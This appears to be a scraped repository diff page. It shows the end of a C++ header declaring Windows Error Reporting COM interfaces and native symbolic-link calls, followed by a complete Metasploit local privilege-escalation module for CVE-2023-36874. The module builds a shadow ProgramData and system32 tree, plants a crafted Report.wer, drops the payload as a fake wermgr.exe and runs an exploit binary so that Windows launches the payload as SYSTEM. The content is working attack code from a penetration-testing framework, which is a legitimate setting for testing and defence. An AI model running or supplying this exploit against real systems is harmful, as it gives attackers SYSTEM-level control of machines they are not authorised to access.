virtual HRESULT __stdcall Proc23(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ BSTR* p1);
|
||||
virtual HRESULT __stdcall Proc24(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ int64_t p1, /* Stack Offset: 24 */ IWerReportSubmitCallback* p2, /* Stack Offset: 32 */ /* unique */BSTR* p3, /* Stack Offset: 40 */ /* unique */int64_t* p4);
|
||||
virtual HRESULT __stdcall Proc25();
|
||||
};
|
||||
|
||||
class __declspec(uuid("1e3a0e4f-1412-444f-8a94-fc6a09cd4195")) IWerStore : public IUnknown {
|
||||
public:
|
||||
virtual HRESULT __stdcall Proc3();
|
||||
virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ BSTR* p0);
|
||||
virtual HRESULT __stdcall Proc5(/* Stack Offset: 8 */ BSTR p0);
|
||||
virtual HRESULT __stdcall Proc6(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ IWerReport** p1);
|
||||
virtual HRESULT __stdcall Proc7(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ BSTR* p1);
|
||||
};
|
||||
|
||||
|
||||
|
||||
class __declspec(uuid("4904c154-426f-4c88-8ec2-4543d18670f7")) IWerStoreFactory : public IUnknown {
|
||||
public:
|
||||
virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ IWerStore** p0);
|
||||
virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ IWerStore** p0);
|
||||
};
|
||||
|
||||
|
||||
|
||||
class __declspec(uuid("6620c14b-70ae-4d4e-a4f6-91a7dcc582c2")) IErcLuaSupport : public IUnknown {
|
||||
public:
|
||||
virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ IWerStoreFactory** p0);
|
||||
};
|
||||
|
||||
|
||||
|
||||
|
||||
typedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
|
||||
typedef NTSYSAPI NTSTATUS(*_NtCreateSymbolicLinkObject)(PHANDLE pHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING DestinationName);
|
||||
typedef NTSYSAPI NTSTATUS(*_NtCreateDirectoryObject)(PHANDLE DirectoryHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
|
||||
|
||||
_NtCreateSymbolicLinkObject pNtCreateSymbolicLinkObject;
|
||||
_RtlInitUnicodeString pRtlInitUnicodeString;
|
||||
_NtCreateDirectoryObject pNtCreateDirectoryObject;
|
|
@ -0,0 +1,170 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::Common
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Microsoft Error Reporting Local Privilege Elevation Vulnerability',
|
||||
'Description' => %q{
|
||||
This module takes advantage of a bug in the way Windows error reporting opens the report
|
||||
parser. If you open a report, Windows uses a relative path to locate the rendering program.
|
||||
By creating a specific alternate directory structure, we can coerce Windows into opening an
|
||||
arbitrary executable as SYSTEM.
|
||||
If the current user is a local admin, the system will attempt impersonation and the exploit will
|
||||
fail.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Filip Dragović (Wh04m1001)', # PoC
|
||||
'Octoberfest7', # PoC
|
||||
'bwatters-r7' # msf module
|
||||
],
|
||||
'Platform' => ['win'],
|
||||
'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],
|
||||
'Targets' => [
|
||||
[ 'Automatic', { 'Arch' => [ ARCH_X64 ] } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => '2023-07-11',
|
||||
'References' => [
|
||||
['CVE', '2023-36874'],
|
||||
['URL', 'https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/'],
|
||||
['URL', 'https://github.com/Wh04m1001/CVE-2023-36874'],
|
||||
['URL', 'https://github.com/Octoberfest7/CVE-2023-36874_BOF']
|
||||
],
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'Reliability' => [REPEATABLE_SESSION],
|
||||
'SideEffects' => [ ARTIFACTS_ON_DISK ]
|
||||
},
|
||||
'Compat' => {
|
||||
'Meterpreter' => {
|
||||
'Commands' => %w[
|
||||
stdapi_fs_delete_file
|
||||
stdapi_sys_config_getenv
|
||||
]
|
||||
}
|
||||
}
|
||||
)
|
||||
)
|
||||
|
||||
register_options([
|
||||
OptString.new('EXPLOIT_NAME',
|
||||
[true, 'The filename to use for the exploit binary (%RAND%.exe by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]),
|
||||
OptString.new('REPORT_DIR',
|
||||
[true, 'The Error Directory to use (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
|
||||
OptString.new('SHADOW_DRIVE',
|
||||
[true, 'Directory to place in the home drive for pivot (%TEMP% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
|
||||
OptInt.new('EXECUTE_DELAY',
|
||||
[true, 'The number of seconds to delay between file upload and exploit launch', 3])
|
||||
])
|
||||
end
|
||||
|
||||
def upload_error_report
|
||||
wer_archive_dir = get_env('PROGRAMDATA')
|
||||
vprint_status(wer_archive_dir)
|
||||
wer_archive_dir << '\\Microsoft\\Windows\\WER\\ReportArchive'
|
||||
report_dir = "#{wer_archive_dir}\\#{datastore['REPORT_DIR']}"
|
||||
report_filename = "#{report_dir}\\Report.wer"
|
||||
vprint_status("Creating #{report_dir}")
|
||||
mkdir(report_dir)
|
||||
wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
|
||||
vprint_status("Writing Report to #{report_filename}")
|
||||
write_file(report_filename, wer_report_data)
|
||||
end
|
||||
|
||||
def build_shadow_archive_dir(shadow_base_dir)
|
||||
wer_archive_dir = shadow_base_dir
|
||||
mkdir(wer_archive_dir)
|
||||
wer_archive_dir << '\\ProgramData\\'
|
||||
mkdir(wer_archive_dir)
|
||||
wer_archive_dir << 'Microsoft\\'
|
||||
mkdir(wer_archive_dir)
|
||||
wer_archive_dir << 'Windows\\'
|
||||
mkdir(wer_archive_dir)
|
||||
wer_archive_dir << 'WER\\'
|
||||
mkdir(wer_archive_dir)
|
||||
wer_archive_dir << 'ReportArchive\\'
|
||||
mkdir(wer_archive_dir)
|
||||
report_dir = "#{wer_archive_dir}#{datastore['REPORT_DIR']}"
|
||||
mkdir(report_dir)
|
||||
return report_dir
|
||||
end
|
||||
|
||||
def upload_shadow_report(shadow_archive_dir)
|
||||
report_filename = "#{shadow_archive_dir}\\Report.wer"
|
||||
wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
|
||||
vprint_status("Writing bad Report to #{report_filename}")
|
||||
write_file(report_filename, wer_report_data)
|
||||
end
|
||||
|
||||
def build_shadow_system32(shadow_base_dir)
|
||||
shadow_win32 = "#{shadow_base_dir}\\system32"
|
||||
vprint_status("Creating #{shadow_win32}")
|
||||
mkdir(shadow_win32)
|
||||
return shadow_win32
|
||||
end
|
||||
|
||||
def upload_payload(shadow_win32)
|
||||
payload_bin = generate_payload_exe
|
||||
payload_filename = "#{shadow_win32}\\wermgr.exe"
|
||||
vprint_status("Writing payload to #{payload_filename}")
|
||||
write_file(payload_filename, payload_bin)
|
||||
end
|
||||
|
||||
def upload_execute_exploit(exploit_path, shadow_path, home_dir)
|
||||
vprint_status("shadow_path = #{shadow_path}")
|
||||
exploit_bin = exploit_data('CVE-2023-36874', 'CVE-2023-36874.exe')
|
||||
write_file(exploit_path, exploit_bin)
|
||||
sleep datastore['EXECUTE_DELAY']
|
||||
vprint_status("Exploit uploaded to #{exploit_path}")
|
||||
cmd = "#{exploit_path} #{shadow_path} #{home_dir} #{datastore['REPORT_DIR']}"
|
||||
output = cmd_exec(cmd, nil, 30)
|
||||
vprint_status(output)
|
||||
end
|
||||
|
||||
def check
|
||||
# This only appears to work on 22H2, but likely will work elsewhere if we figure out the function pointers.
|
||||
version = get_version_info
|
||||
vprint_status("OS version: #{version}")
|
||||
return Exploit::CheckCode::Appears if version.build_number == Msf::WindowsVersion::Win10_22H2
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
fail_with(Module::Failure::BadConfig, 'User cannot be local admin') if is_in_admin_group?
|
||||
fail_with(Module::Failure::BadConfig, 'Already SYSTEM') if is_system?
|
||||
shadow_dir = datastore['SHADOW_DRIVE']
|
||||
home_dir = get_env('HOMEDRIVE')
|
||||
shadow_path = "#{home_dir}\\#{shadow_dir}"
|
||||
vprint_status("Shadow Path = #{shadow_path}")
|
||||
upload_error_report
|
||||
shadow_archive_dir = build_shadow_archive_dir(shadow_path.dup)
|
||||
upload_shadow_report(shadow_archive_dir)
|
||||
shadow_system32 = build_shadow_system32(shadow_path.dup)
|
||||
upload_payload(shadow_system32)
|
||||
sleep datastore['EXECUTE_DELAY']
|
||||
exploit_path = "#{shadow_path}\\#{datastore['EXPLOIT_NAME']}"
|
||||
exploit_path << '.exe' unless exploit_path[-4..] == '.exe'
|
||||
if shadow_dir.length > 64
|
||||
fail_with(Module::Failure::BadConfig, 'REPORT_DIR value too long')
|
||||
end
|
||||
upload_execute_exploit(exploit_path, shadow_dir, home_dir)
|
||||
print_warning("Manual deletion of #{shadow_path} may be required")
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue